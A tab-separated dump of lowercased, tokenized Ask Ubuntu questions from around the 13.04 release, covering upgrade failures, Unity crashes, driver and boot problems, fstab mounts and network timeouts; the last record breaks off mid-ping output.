287891	two home folder . ubuntu 12.10	hi to all , recently i installed ubuntu 12.10 . it 's very nice and i like it very much . i have a few doubts about folders , as i was previously using windows . in windows , i have 3 local disks c , d , e . now i did a partition in ubuntu following these steps : partition with system data mounted is / 25 gb swap partition is 4gb partition dedicated to personal data mounted on /home that is 46 gb , because i only had an 80gb hdd . my doubt is if it is possible to create two home folders , like windows ' local disks d & e , to store data in different folders . does anyone know how to create two folders to store data ?
287897	unity wo n't start after upgrading to 13.04	well , everything has gone to crap after upgrading from 12.10 to 13.04 . after logging in i see no panels whatsoever , only desktop with some files . trying to run unity from terminal results in following : compiz ( core ) - info : starting plugin : core unity-panel-service : no process found compiz ( core ) - info : loading plugin : ccp compiz ( core ) - info : starting plugin : ccp compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity compiz ( core ) - info : loading plugin : composite compiz ( core ) - info : starting plugin : composite compiz ( core ) - info : loading plugin : opengl compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : unity is fully supported by your hardware . compiz ( core ) - info : starting plugin : opengl compiz ( core ) - info : loading plugin : compiztoolbox compiz ( core ) - info : starting plugin : compiztoolbox compiz ( core ) - info : loading plugin : decor compiz ( core ) - info : starting plugin : decor compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid compiz ( core ) - info : loading plugin : resize compiz ( core ) - info : starting plugin : resize compiz ( core ) - info : loading plugin : gnomecompat compiz ( core ) - info : starting plugin : gnomecompat compiz ( core ) - info : loading plugin : copytex compiz ( core ) - info : starting plugin : copytex compiz ( core ) - info : loading plugin : snap compiz ( core ) - info : starting plugin : snap compiz ( core ) - info : loading plugin : regex compiz ( core ) - info : starting plugin : regex compiz ( core ) - info : loading plugin : vpswitch compiz ( core ) - info : starting plugin : vpswitch compiz ( core ) - info : loading plugin : place compiz ( core ) - info : starting plugin : place compiz ( core ) - info : loading plugin : scale compiz ( core ) - info : starting plugin : scale compiz ( core ) - info : loading plugin : imgpng compiz ( core ) - info : starting plugin : imgpng compiz ( core ) - info : loading plugin : move compiz ( core ) - info : starting plugin : move compiz ( core ) - info : loading plugin : mousepoll compiz ( core ) - info : starting plugin : mousepoll compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session compiz ( core ) - info : loading plugin : wall compiz ( core ) - info : starting plugin : wall compiz ( core ) - info : loading plugin : animation compiz ( core ) - info : starting plugin : animation compiz ( core ) - info : loading plugin : unitymtgrabhandles compiz ( core ) - info : starting plugin : unitymtgrabhandles compiz ( core ) - info : loading plugin : expo compiz ( core ) - info : starting plugin : expo compiz ( core ) - info : loading plugin : ezoom compiz ( core ) - info : starting plugin : ezoom compiz ( core ) - info : loading plugin : workarounds compiz ( core ) - info : starting plugin : workarounds compiz ( core ) - info : loading plugin : unityshell compiz ( core ) - info : starting plugin : unityshell warn 2013-04-29 17:23:52 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.autopilot.introspection ' yet as we do n't have a connection , waiting for it ... warn 2013-04-29 17:23:52 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.debug.logging ' yet as we do n't have a connection , waiting for it ... warn 2013-04-29 17:23:53 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-04-29 17:23:53 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-04-29 17:23:53 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2013-04-29 17:23:53 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.launcher ' yet as we do n't have a connection , waiting for it ... warn 2013-04-29 17:23:53 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'com.canonical.unity.dash ' yet as we do n't have a connection , waiting for it ... warn 2013-04-29 17:23:53 unity.glib.dbus.server glibdbusserver.cpp:580 ca n't register object 'org.gnome.sessionmanager.endsessiondialog ' yet as we do n't have a connection , waiting for it ... compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct compiz ( decor ) - warn : no default decoration found , placement will not be correct bus error ( core dumped )
287898	how to tackle `` libc.so.6 : version `glibc_2.14 ' not found '' without upgrading the whole os	i 'm trying to run an application on ubuntu 11.10 64bits . when i do ldd it tells me that /lib/x86_64-linux-gnu/libc.so.6 : version `glibc_2.14 ' not found i know what causes this problem and reading the solutions on internet everyone suggesting to upgrade to 12.04 ( or 13.04 now ! ) . the problem is that this is shared computer and has several users and in practice i can not upgrade to 12.04 . my question is , if there is a way to upgrade only this library ? can i simply copy the so file from my own 12.04 here ? if yes , which files should i copy ?
287900	upgrade to quantal went wrong	i have an asus ux32 and recently upgraded to quantal . problems began when compiz suddenly crashed mid upgrading process and rebooted automaticaly . after a sudo apt-get upgrade -f and a reboot my problems began : wifi stopped working ; nvidia drivers missing ; unity slugish ( both might be related ) ; usb mouse not recognized ; fn keys stopped working ; sound not working . /etc/modules is empty but i honestly do n't know if it 's related somehow . any ideas where i should start fixing this ? edit : running ls /var/lib/initramfs-tools | sudo xargs -n1 /usr/lib/dkms/dkms_autoinstaller start ( saw this somewhere ) stated that the kernel-headers ( 3.5.0.27 ) could n't be found . anyway to install it offline ?
287903	can not install guest additions in ubuntu 13.04 on vbox 4.2.12	i 've had the same issue with the previous version but i was able to fix it . i 've just updated to ubuntu 13.04 and now have the same problem again . basically , i can not install the guest additions from the desktop because the compiz application fails and i just see the background , there is no way for me to autorun the vbox additions . so i need to open the command shell from grub , mount the cd and run the linux additions from there . everything is fine for step one and two . however , when i try sh ./vboxlinuxadditions.run i receive an error message regarding read-only file system . mkdir : can not create directory `/tmp/selfgz741 ' : read-only file system can not create target directory /tmp/selfgz741 here is the permissions for the /tmp folder : drwxrwxrwt root root tmp i 'm wondering what is required so that i can write in the /tmp folder . also , when i 'm in the console , i 'm connected as root @ virtualbox . thanks .
287907	exchange 2010 client for ubuntu 13.04	is there a way i can check my ms exchange email accounts in a desktop client rather than the web interface ( s ) ? between school , work , and personal , i have four accounts and it would be much easier to be able to check all in one place like i can with ms outlook . i 've seen ways to do this in 12.04 and some earlier but these did n't seem to work on 12.10 . any help with doing this on ubuntu 13.04 would be greatly appreciated . thanks !
287916	libreoffice global menu not working ( ubuntu 13.04 )	there is a bug on ubuntu 13.04 with libreoffice 4 , the global menu and huf do not work correctly . i use ubuntu 13.04 ( i intalled the beta 2 , a week before the final release )
287926	no terminal icons on ubuntu 13.04	when i start a gnome terminal session in ubuntu 13.04 , there is no terminal icon on the launcher , and when i alt + tab through the apps , it is not there either . anyone know how i can make this work ?
287930	what is a devel-release ?	there are a lot of people that have problems upgrading to 13.04 ... now every time they are told to put this in the terminal : sudo do-release-upgrade -d. now i 've been wondering what the -d stands for . in the man pages they speak of a devel release . can someone explain to me what a devel release is ?
287936	changing nautilus key	i can not seem to find a way to set `` up 1 folder '' to backspace in 13.04 ( nautilus 3.6.3 ) i tried editing ~/.config/nautilus/accels and i also tried the dconf > org > gnome > interface > can change accels what are the steps to change this ?
287938	how do i minimize stuff to the system tray ?	in 13.04 , how do i make applications ( specifically , pidgin , nicotine+ , lifeograph , evolution etc..and more ) to the indicator area as icons ? i need them to be running but need to clear the space in the launcher . in 12.10 , i had briefly used alltray . it crashed every time i used it and i did not understand the menu options it presented and what they did . also the icons it minimized to were having white background , which stood out ugly in the grey ubuntu toolbar . i had also heard of devilspie but could not operate it as it seemed too complicated , with lot of options . would help if there is some reading material available for the setup . i would like to start these applications minimized to the indicator area at startup itself and keep running in the background . is there any software to specifically help me do that , or any documentation or help on how to do that using the two i have mentioned , would be appreciated .
287939	update available message after installing update	i have just updated my htpc to 13.04 ( using do-release-upgrade ) and when logging in i get the `` new release available '' message , while there is n't as i 've just upgraded and running that version . me @ mybox : ~ $ ssh htpc me @ htpc 's password : welcome to ubuntu 13.04 ( gnu/linux 3.8.0-19-generic i686 ) * documentation : https : //help.ubuntu.com/ new release '13.04 ' available . run 'do-release-upgrade ' to upgrade to it . so i am at 13.04 , but i can upgrade to 13.04 . sounds like a plan . or not . i have done an apt-get update and upgrade ( was nothing new ) and rebooted the machine . why is this message still here , and what needs fixing so it goes away ? for more info maybe : htpc : ~ $ uname -a linux htpc 3.8.0-19-generic # 29-ubuntu smp wed apr 17 18:19:42 utc 2013 i686 athlon i686 gnu/linux
287946	unofficial software on 12.10 preventing upgrade to 13.04 . how to proceed ?	postgresql 9.2 is not included standard with 12.10 , but my work requires features unavailable in past versions . i had previously followed these instructions to install postgresql 9.2 and there were no problems directly with this install . i 'm now trying to upgrade to 13.04 from 12.10 , but encounter an `` unresolvable problem '' while setting new software channels . i run update-manager . everything is up to date , but get the message that 13.04 is available now and i click upgrade . i do n't think it 's relevant , but before i encounter the major error , i 'm told some third party entries in your sources.list were disabled . you can re-enable them after the upgrade with the 'software-properties ' tool or your package manager . this does not impede the install , so i close it and continue . fetching completes and it begins setting new software channels . i then encounter the `` unresolvable problem '' : what do i need to do to proceed with my upgrade to 13.04 ? update : i uninstalled postgresql 9.2 , upgraded , and added postgresql 9.2 ( from an older distro package ) as described here . this is working fine , i 'm running 13.04 and have postgresql 9.2 , but this workaround is not possible for our production server . uninstalling postgresql on the server risks losing our database . i need a solution that does not require removing postgresql , see this question .
287951	trivia bug in bash script	# ! /bin/bash aa= $ ( ps -e | grep `` chrome '' | awk ' { print $ 1 ; } ' ) for i in $ aa do gnome-terminal -- tab -e '' sudo cpulimit -p $ i -l 35 `` done when i run it i get error missing argument e i want it when a chrome process get run to get all process related parent and children and safe them in aa variable then i open the gnome terminal to cpulimit one by one , any help pls ?
287953	libreoffice crashes ( or hangs ) 12.10 and 13.04	i installed ubuntu 12.10 several months ago , but libreoffice was entirely unusable . whenever i opened a document , spreadsheet , etc . it would crash or hang the desktop . i waited for ubuntu 13.04 , hoping that this would be resolved , but the issue is the same . has anyone else seen this ? any hints for getting past this ? or do i need to go back to 12.04 ?
287954	problem with /usr/bin/ld : main.o : undefined reference to symbol 'exp @ @ glibc_2.2.5 '	during installation emerald in ubuntu 13.04 when i write `` sudo make '' i have problem : libtool : link : gcc -g -o2 -pthread -i/usr/include/libwnck-1.0 -i/usr/include/compiz -i/usr/include/gtk-2.0 -i/usr/lib/x86_64-linux-gnu/gtk-2.0/include -i/usr/include/atk-1.0 -i/usr/include/cairo -i/usr/include/gdk-pixbuf-2.0 -i/usr/include/pango-1.0 -i/usr/include/gio-unix-2.0/ -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -i/usr/include/pixman-1 -i/usr/include/freetype2 -i/usr/include/libpng12 -i/usr/include/harfbuzz -i/usr/include/startup-notification-1.0 -o .libs/emerald main.o engine_loader.o ../libengine/.libs/libemeraldengine.so -lwnck-1 -lgtk-x11-2.0 -lgdk-x11-2.0 -latk-1.0 -lgio-2.0 -lpangoft2-1.0 -lgdk_pixbuf-2.0 /usr/lib/x86_64-linux-gnu/libfreetype.so -lfontconfig -ldecoration -lxrender -lx11 -lpangocairo-1.0 -lpango-1.0 /usr/lib/x86_64-linux-gnu/libcairo.so -lgobject-2.0 -lglib-2.0 -pthread /usr/bin/ld : main.o : undefined reference to symbol 'exp @ @ glibc_2.2.5' /usr/bin/ld : note : 'exp @ @ glibc_2.2.5 ' is defined in dso /lib/x86_64-linux-gnu/libm.so.6 so try adding it to the linker command line /lib/x86_64-linux-gnu/libm.so.6 : could not read symbols : invalid operation collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ emerald ] błąd 1 make [ 1 ] : opuszczenie katalogu `/home/stanek/emerald-0.9.5/src' make : *** [ install-recursive ] błąd 1
287955	modifying path does not work	i want to add /home/myname/adt-bundle-linux-x86_64-20130219/eclipse to path . i edited .profile : path= '' $ home/bin : $ path : /home/myname/adt-bundle-linux-x86_64-20130219/eclipse '' but it wo n't work . why ? when i instead save export path=/home/myname/adt-bundle-linux-x86_64-20130219/eclipse : $ path in a file in /etc/profile.d/ and do chmod a+x it works . both should work . i would like to understand why the first option does not work .
287957	during boot : an error has occured while mounting ( 13.04 )	so i get this message during boot saying that it failed to mount the /home/chris/videos/anime drive . it 's the same kind of drive as my /home and /home/backup drives , formatted the same , etc ... but it 's the only one with the problem . when ubuntu loads , i can open the drive and it 's then automounted at this point right where i want it . so i am unsure why it would fail during boot ... here 's my fstab : uuid=1997e153-487e-497c-b061-37fc00ea70a2 / ext4 noatime , discard , errors=remount-ro 0 1 uuid=ec8090e1-8e44-44f9-b186-acb2259bdf58 /home ext4 defaults , noatime 0 2 uuid=4870214c-28d8-4268-b783-e78be9df2423 /home/backup ext4 defaults , noatime 0 2 uuid=e868db4b-bfd1-40d3-8e1c-0c3cd9e344ce /home/chris/videos/anime ext4 defaults , noatime 0 2 so far i have tried to mount it elsewhere and it seems i am unable to mount inside my `` chris '' folder , though like my backup drive i can mount it to my /home drive . am i not allowed to mount in that area ? if so , why would i only not be allowed during boot ? as mentioned if i open the drive it will auto mount to the directory i want . this is only a minor inconvenience as i only have to deal with it once after i boot up and not worry about it again until i boot up again , but i 'd still like to find out why . could it be a permissions issue ? though would n't the fstab work as root ?
287958	ubuntu 13.04 - hp laserjet p1006 not recognizeed	did new install of ubuntu 13.04 on a 64-bit system . hp laserjet p1006 printer is not recognized . printer was working fine on ubuntu 12.10 . searched for hplip on the hp.com website . ubuntu 12.10 is the highest os release listed on the hp driver site . ubuntu software center indicates that hplip 3.13.3-1 is already installed . did an uninstall/reinstall -- same problem . how to get this printer working in u13.04 ? update 5/1/13 -- the repository for hplip ( hp linux imaging and printing ) is found at http : //hplipopensource.com/hplip-web/index.html . highest ubuntu release listed at that site is 12.10 . ubuntu 13.04 may be too new for hplip compatibility to be worked out . i have dropped back down to ubuntu 12.04 , and will monitor the hplipopensource.com site for a version of hplip that is compatible with u 13.04 . -- gs
287959	how to revert notifyosd configuration to default ?	i had set the notification bubble to bottom right , but when i set it back to top right , it 's at the very far top right and overlaps with the panel . how do i set it to default ?
287960	ubuntu touch on tf 101	i was wondering when there will be a useable version of touch ? i have used the developer buld but want to be able to add acounts and actually use it
287964	lubuntu 12.10 usb drive stop connections after software update , screen resolution also not working well	few days ago i had a little problem with my hard disks , and after that , i 'm running my computer with a lubuntu live usb . first i made a live usb with no persistence , and it runs fine on every machine i have tested . but changing options like keyboard style , wireless passwords and so on every boot is no good . so i re-write a live usb with persistence , and it runs ok . it boots slower than the stick with no persistence , but every thing seems to be ok . i decided to make a software update , and it gaves me an error ( witch i not remember exactly ) on the end of process . in the same boot i try to remove the english translation pack , due i 'm speak portuguese . everything seems to be ok , i rebooted the machine , and the lubuntu screen ( after choose to try without changes on computer ) go to an weird text mode , the boot take more time to complete , and when the system is ready , the screen resolution is wrong , with less definition and feels like streched , and so my wi-fi connection does n't work . i 'm able to choose enable network , but nothing happens . i believe that if i re-write my usb stick the problem can be solved , but i 'm looking for a less invasive intervention . oh , i forget to mention that i tried to change the screen resolution when booted , but no options fits my screen . sorry for my bad english , thanks for help .
287976	how to get rid of the `` scanning for btrfs file systems '' at start-up ?	after upgrading from ubuntu12.10 to ubuntu13.04 , i briefly get a message `` scanning for btrfs file systems '' at starting-up . i do n't have any btrf-filesystem . how can i get rid of this message ? ( pops up as black screen between the coloured start-up-screens ) .
287977	resize non-adjacent partitions ?	i have a dual boot with three main partitions , one each for ubuntu , windows , and my files . i want to make the one with windows ( `` os '' ) a bit larger , which would have to be at the expense of the one with my files ( `` bspace '' ) , but when looking in gparted i find they are not adjacent to each other . even if i shrink `` bspace '' i could n't extend `` os '' into the gap ... ... or can i ? i 'm a bit uncertain and do n't want to mess up the whole system ( even if i have a backup ) all suggestions welcome thanks !
287984	how can i install git-annex assistant	i install recently git annex in ubuntu 12.10 using apt . however , the package seems to be built without the assistant support . is there a ppa or another way of installing it ? i 'd rather avoid installing it from the tarball because i would like to install it in beginners computers ( that i do n't want to manage manually ) . does raring ringtail include the assistant support ?
287988	12.04 ubuntu install failure or hardware issue ?	when installing ubuntu 12.04 the install feature asks if i want to remove the old os ( windows xp ) , i choose yes , but when the install finishes and restarts the computer it ca n't load the ubuntu os and when i choose to install it from disk again and then put it onto the hdd it asks if i want to remove the old os again ! ! ? ? is this a hardware issue/software issue ? is it ever going to work or am i wasting my time ? so far , i 've tried reinstalling it ... and checked all the hardware is connceted correctly and reads it ok. hardware details : celeron 2.66ghz , 1.2gb ram , 40gb hdd with an 80gb slave ( having trouble reading that one properly ) , ubuntu 12.4 , 30.2 gb free on master hdd . also ubuntu works fine if running off the cd/dvd . after fiddling with it for a whole day i now get an error : grub loading stage1.5read error really need some help guys its not the hdd its something else . im brand new to ubuntu and i cant even get it to work . also this is the first computer ive ever built ive known how to do it for ages but never practiced .
287989	are there graphic card problems when upgrading to ubuntu 13.04	i have ubuntu 12.04 installed on my laptop having ati graphic card . i tried ubuntu 12.10 before on this same laptop and i encountered a lot of problems with unity ( due to lack of support for my gpu in linux version used by 12.10 ) . i want to know if i 'll face same problems if i upgrade my 12.04 version to 13.04 ?
287993	everything freezes except mouse . ubuntu 12.10	i use ubuntu 12.10 32bit gnome 3.6.0 with unity gpu : intel 3000 hd in about this computer : processor : intel® core™ i5-2410m cpu @ 2.30ghz × 4 gpu : intel® sandybridge mobile x86/mmx/sse2 everything fine , except occasionally everything freezes ( display , keyboard , mouse clicking actions ) except the movement of the mouse ( and i can observe it 's movement ) . before this problem occur i was having troubles with false x serv alerts . i 'm just asking if noone come up with solution , at least someone with my type of machine and my configurations ( given up above ) to run $ uname -r and tell me the kernel version . ( of course if he does n't have these kind of problems )
287994	could not download upgrades	i 'm trying to upgrade from 12.10 to 13.04 and for about an hour it 's been trying to download files and it stops at 1444/1447 and says ( could not download upgrades ) any help ?
287996	deactivate crypt and enable automatic login	i installed ubuntu 13.04 with the home folder encryption . now i want to disable the encryption and enable the automatic login . but now is the question , how can i do that ?
287999	how to tell if 13.04 will run slowly on my computer	i am running ubuntu 12.04 32 bit and when i try to upgrade to 12.10 i see an error saying that my computer will run slowly . if i upgrade to 12.10 and then 13.04 will my computer still run slow or will 13.04 run on my computer smoothly . i have an ibm thinkpad t42 with a 1.7 ghz processor and 1 gig of ram .
288000	passing usb smart card works with rdesktop but not freerdp	rdesktop works great to login to my windows 7 enterprise system and passes the activkey usb smart card with no problems . once the session is started , i can login to vpn and authenticate to websites on the remote system perfectly . unfortunately i can only get 16 color depth with rdesktop and would like to leverage higher color depths since i use this remote system all day long . remmina client and freerdp from the command line both work well at the higher color depth but reminna does n't have an option passing the smart card and freerdp does n't work when i pass it with rdpdr `` scard '' option . any ideas on what i am doing wrong or is there another tool that might work better ? this works : $ rdesktop -z -a 24 -t myserver -d domain -u username -x l -p -f -r sound : remote -r scard : '' actividentity activkey_sim 00 00 '' xxx.xxx.xxx.xxx this connects okay but does n't pass the smart card : $ $ xfreerdp -d domain -u username -f -- plugin rdpdr -- data scard : '' actividentity activkey_sim 00 00 '' -- x.x.x.x loading plugin rdpdr connected to x.x.x.x:3389 password : freerdp_load_library_symbol : failed to open /usr/lib/x86_64-linux-gnu/freerdp/scard.so : /usr/lib/x86_64-linux-gnu/freerdp/scard.so : can not open shared object file : no such file or directory freerdp_load_plugin : failed to load scard/deviceserviceentry i am using : ubuntu 13.04 remmina 1.0.0-4ubuntu2 freerdp-x11 1.0.1-2ubuntu1 rdesktop 1.7.1-1ubuntu4 pcsc-tools 1.4.21-1 coolkey 1.1.0-12 libccid 1.4.9-1 pcscd 1.8.6-3ubuntu1b1 thanks for any assistance . henry
288007	skype crashes in ubuntu 13.04 64bit edition - while talking	i 'm new to ubuntu so please answer me as simply as possible . the problem is when i make or receive a skype call , we can talk for about 2-5 mins and then skype just shuts down ..do you know what to do to make it work ? this is a acer aspire 4830g with nvidia geforce gt540m cuda 1gb graphic card .
288010	running hadoop on ec2 and hadoop_home variable ?	i am following hadoop in action to get started with hadoop with ec2 . i 'm running on ubuntu and have downloaded and installed the latest version of hadoop . i am hitting a road block at this command : hadoop-ec2 launch-cluster mycluster 2 the book says `` the hadoop ec2 tools are in the directory src/contrib/ec2/bin under your hadoop installation . recall that our ec2-init.sh script has already added that directory to your system path . within that directory is hadoop-ec2 , which is a meta-command for executing other commands . to launch a hadoop cluster on ec2 use : hadoop-ec2 launch-cluster < cluster-name > < number-of-slaves > '' the response i get is : hadoop-ec2 : command not found i noticed that the variable $ hadoop_home is not set . it looks like this book is out-dated . can someone direct me to a tutorial that was created in the last couple of months on how to set up hadoop with ec2 ? after some quick googling , it seems that hadoop_home is deprecated . is this true ? i am able to without problems execute ec2-describe-images . and get all the available images that i can use . why does n't hadoop-ec2 command work ? thank you for your guidance . i know that hadoop/bin shoudl exist and when i did this : sudo find / -wholename '*hadoop/bin*' i found nothing .
288017	backspace key is not working in ubuntu 13.04	the backspace key is not working . and how i can format of usb drive in 13.04 . thank you ubuntu developer team for making beautiful os .
288018	ubuntu 13.04 64-bit installed but hangs during boot on dual-boot win7 pro 64-bit system	my win7 pro 64-bit system ( 8gb , 1tb , 3.2ghz intel xeon w3565 ) was working fine . i wanted to add ubuntu 13.04 . i booted from usb , selected try me , everything booted fine and i got my unity desktop . i finally installed ubuntu alongside win7 . grub comes up with ubuntu as the default . i scroll down and windows boots fine . i reboot and let it try ubuntu . nothing . the screen goes black and i have a blinking cursor in the top left . it hangs . i reboot and go to advanced options and choose recovery mode . i get output but again , it hangs . the last few lines i see are ( times are truncated by me ) ... [ 0.51 ] acpi : powerbutton [ pwrf ] [ 0.51 ] acpi : requesting acpi_cpufreq [ 1.49 ] refined tsc clocksource calibration : 3.199.999 mhz . [ 1.49 ] switching to clocksource tsc any ideas on how to fix ? or even how to just uninstall ubuntu altogether ? i tried the os-uninstaller , but that does n't seem to work [ exist ] with a 13.04 usb stick . i guess i can try putting an older version of ubuntu on the stick and see if i can install to the os-uninstaller . [ edit ] i successfully uninstalled 13.04 by booting linux-secure-12.10-64bit.iso from usb and running os-uninstall . i also tried the boot-repair tool , but all that did was add another win7 entry into the grub menu ( one for dev/sda1 and another for dev/sda2 , and both work and boot to win7 ... http : //paste.ubuntu.com/5616403 ) . from what i can tell , i do n't have uefi , just normal bios .
288034	i need help resolving dual display issues with 13.04 running the ati radeon open source driver	i did a fresh install of 13.04 on my dell precision m6500 . i was previously running 12.04 lts . my laptop has an ati mobility radeon hd 5870 adapter and i 'm using the open source driver . plugging in an external display on boot enables mirroring which is nice by default . since i want to run this off to extend my display , i use the display adapter utility to uncheck mirror and apply . about 50 % of the time , i get a crash of unity and/or compiz . i lose the launcher and the title bars on my window and the ability to change windows . pretty scary stuff since 12.04 ltd did n't have this problem . to recover my apps , i do a ctrl-alt-f1 to get to a terminal , log in , cross my fingers , and run : unity -- replace or display=:0 unity -- replace i then do a ctrl-alt-f7 and pray that my apps respond again so that i can close them and restart . if i do n't get my apps to respond , i 'll try this from a console terminal : display=:0 compiz -- replace this will sometimes get my apps back , albeit without unity . at least i can close them gently . if i ca n't get my apps back , i have to close the apps i can and restart via ctrl-alt-del and home that my hidden applications panic . i will also get unity / compiz crashes when using shutter and sometimes when accessing the stormcloud weather application . i tried the proprietary ati drivers , and they were worse , with mirroring on by default and attempting to unmirror via the ati utility or the ubuntu display manager not working either . i was also getting the virtual display adapter resolution error and i was n't ready to have manually maintained a xorg.conf file . here are some display particulars for my system : jim @ jim-precision-m6500 : ~ $ lspci -nnk | grep -i vga -a3 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati broadway xt [ mobility radeon hd 5870 ] [ 1002:68a0 ] subsystem : dell firepro m7820 [ 1028:12ef ] kernel driver in use : radeon 01:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati juniper hdmi audio [ radeon hd 5700 series ] [ 1002 : aa58 ] jim @ jim-precision-m6500 : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : x.org opengl renderer string : gallium 0.4 on amd juniper opengl version string : 3.0 mesa 9.1.1 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes so i 'm quite frustrated at this point and the 3 to 5 unity crashes a day are unproductive . any advice out there ? thanks
288035	unity is very low speeds in ubuntu 13.04	my system specs are as follows : ram : 3gb cpu : amd sempron ( tm ) processor 140 processor 2.69 ghz graphic : nvidia geforce 9400 gt 1gb i 've installed ubuntu 13.04 , and unity is working very slow . dash or right click to open any other application is delayed . i have not yet installed the graphics card . at the time of installation , i did not connect to the internet .
288037	ubuntu 13.04 64 bit wo n't boot , freezes on black screen	do n't know much about ubuntu but will try to be as specific as possible . after updating from 12.10 it auto-restarted , the screen went to black and froze there . i restarted it manually and got to the grub menu . after trying a few things i went into ubuntu advanced options , where it had the option to boot ubuntu 3-8.0-19-generic or ubuntu 3-5.0-27-generic , and recovery options for both . after selecting the 3-5.0-27-generic option ( which i guess is an older kernel version ) it went through several pages of code and then unity started up . however , when i restart it freezes again . what can i do to get the updated kernel version working ? will be happy to provide any more information . help really appreciated !
288040	problem with internet . certain website do not load at all . 12.04	my internet was working fine till tomorrow . suddenly i am not able to open www.github.com , www.deviantart.com and additionally my router configuration page 192.168.2.1 . first , i thought that it would be a problem with my isp ( i have a dsl connection ) . i have a dual-boot system with win7 , so checked the connection there . it all worked fine ! certainly it was not the isp who was troubling , it had to do something with ubuntu . problems and errors : github says : this webpage is not available google chrome could not load the webpage because github.com took too long to respond . the website may be down , or you may be experiencing issues with your internet connection . here are some suggestions : reload this webpage later . check your internet connection . restart any router , modem , or other network devices you may be using . add google chrome as a permitted program in your firewall 's or antivirus software 's settings . if it is already a permitted program , try deleting it from the list of permitted programs and adding it again . if you use a proxy server , check your proxy settings or contact your network administrator to make sure the proxy server is working . if you do n't believe you should be using a proxy server , adjust your proxy settings : go to the chrome menu > settings > show advanced settings ... > change proxy settings ... and make sure your configuration is set to `` no proxy '' or `` direct . '' error 7 ( net : :err_timed_out ) : the operation timed out . the same goes with the router configuration page , while deviantart takes forever to load . what i tried : i read some previous posts on this topic , and i tried the following : 1 ) i use google chrome . i switched to firefox on ubuntu but did n't work . 2 ) cleared the cache and cookies , but no . 3 ) set the primary dns server to google public dns , then to open dns , still nothing . 4 ) tried to set the primary dns to 192.168.2.1 , still no . 5 ) i reset my router , configured it from scratch in win7 and came back to ubuntu , to see that the problem still persisted . 6 ) pinged www.github.com and then google.com , here are the results : ping www.github.com ( 204.232.175.90 ) 56 ( 84 ) bytes of data . 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=1 ttl=53 time=390 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=2 ttl=53 time=392 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=3 ttl=53 time=384 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=4 ttl=53 time=394 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=5 ttl=53 time=396 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=6 ttl=53 time=402 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=7 ttl=53 time=397 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=9 ttl=53 time=402 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=10 ttl=53 time=397 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=11 ttl=53 time=397 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=12 ttl=53 time=398 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=13 ttl=53 time=400 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=14 ttl=53 time=399 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=15 ttl=53 time=403 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=16 ttl=53 time=404 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=17 ttl=53 time=406 ms 64 bytes from github.com ( 204.232.175.90 ) : icmp_req=18 ttl=53 time=403 ms -- - www.github.com ping statistics -- - 18 packets transmitted , 17 received , 5 % packet loss , time 31092ms rtt min/avg/max/mdev = 384.510/398.374/406.145/5.407 ms ping www.google.com ( 173.194.38.176 ) 56 ( 84 ) bytes of data . 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=1 ttl=53 time=132 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=2 ttl=53 time=130 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=3 ttl=53 time=128 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=4 ttl=53 time=126 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=5 ttl=53 time=129 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=6 ttl=53 time=128 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=7 ttl=53 time=133 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=8 ttl=53 time=123 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=9 ttl=53 time=131 ms 64 bytes from sin04s02-in-f16.1e100.net ( 173.194.38.176 ) : icmp_req=10 